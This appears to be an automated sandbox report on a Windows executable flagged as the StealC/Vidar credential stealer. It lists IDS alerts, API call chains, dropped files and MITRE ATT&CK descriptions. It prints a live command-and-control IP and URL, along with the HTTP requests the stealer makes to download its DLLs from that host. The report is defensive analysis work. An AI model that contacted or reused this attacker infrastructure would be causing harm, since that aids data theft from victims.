Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003D8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_003D8EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB96C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6CB96C80

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.8:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.8:49704
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.8:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.8:49704
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.8:49704 -> 185.215.113.37:80

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AAFIDGCFHIEHJJJJECAKKJDBAF

C:\ProgramData\AKEGDAKEHJDHIDHJJDAECFBKFH

C:\ProgramData\CBAKJKJJJECFIEBFHIEG

C:\ProgramData\DBAEHCGHIIIDHIECFHJD

C:\ProgramData\FCGCFCAF

C:\ProgramData\FHCAEGCBFHJDGCBFHDAFBAFIII

C:\ProgramData\GCBFBGCG

C:\ProgramData\KECBGCGCGIEGCBFHIIEBFCAFHI

C:\ProgramData\KKJKKJJKJEGIECAKJJEB

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

Windows Analysis Report
file.exe

Function 003D9860 Relevance: 65.0, APIs: 33, Strings: 4, Instructions: 212
libraryloaderCOMMON

Function 003C45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 003CBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 6CB835A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Function 003D4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 003D9C10 Relevance: 231.7, APIs: 112, Strings: 20, Instructions: 684
libraryloaderCOMMON

Function 003C7710 Relevance: 98.6, APIs: 54, Strings: 2, Instructions: 584
stringmemoryCOMMON

Function 003D0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Function 003C5100 Relevance: 56.6, APIs: 19, Strings: 13, Instructions: 572
stringnetworkmemoryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre